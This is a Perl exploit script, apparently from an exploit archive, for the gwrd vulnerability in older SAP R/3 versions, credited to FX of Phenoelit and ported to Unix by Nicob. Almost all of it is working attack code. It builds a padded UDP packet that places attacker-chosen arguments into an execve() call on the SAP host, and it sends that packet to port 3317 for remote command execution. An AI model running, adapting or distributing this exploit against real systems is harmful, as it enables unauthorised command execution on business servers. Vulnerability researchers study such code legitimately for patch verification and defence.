Linux port of the exploit for the gwrd bug in SAP versions below 4.6D patch 1767 and versions below 6.40 patch 4. Allows for remote command execution. Perl version.
df146978b0f9a1b8ac7a1f5975813e0c7bf897e1d0e696c46d6776c344a2cb75
#!/usr/bin/perl -w
use IO::Socket;
# Unix version of the FX SAP R/3 gwrd vuln.
#
# We partially control a call to excve() made by lnaxdm/sapsys
# Easily exploitable with local access
# Could be done remotely under some conditions
#
# 2003, FX of Phenoelit <fx@phenoelit.de> (Win32 original code)
# 2005, Nicob <nicob@nicob.net> (Unix version)
#
$|=1;
die "Give filename" unless ($command=shift);
die "Give arg1" unless ($param1=shift);
die "Give arg3" unless ($param3=shift);
die "Arg1 too long" if (length($param1) > 8);
die "Arg3 too long" if (length($param3) > 8);
die "Give host" unless ($host=shift);
$port="3317" unless ($port=shift);
$request =
"\x01".
"\x02".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
# Second arg to execve()
# 8 chars long
$param1.
" " x (8 - length($param1)).
"_0_0_0_0_0_".
# Fourth arg to execve()
# 8 chars long
$param3.
" " x (8 - length($param3)).
"_1_1_1_1_1__2_2_2_2_2".
# First arg to execve()
# Unlimted length, end with %00
$command."\x00";
&send_UDP($host,$port);
exit 0;
sub send_UDP {
my $remote;
my $rline;
my $dest;
my $port;
($dest,$port) = @_;
$remote =
IO::Socket::INET->new(Proto=>"udp",PeerAddr=>$dest,PeerPort=>"$port",);
unless ($remote) { die "cannot get socket for $dest" }
$remote->autoflush(1);
print $remote $request;
close $remote;
}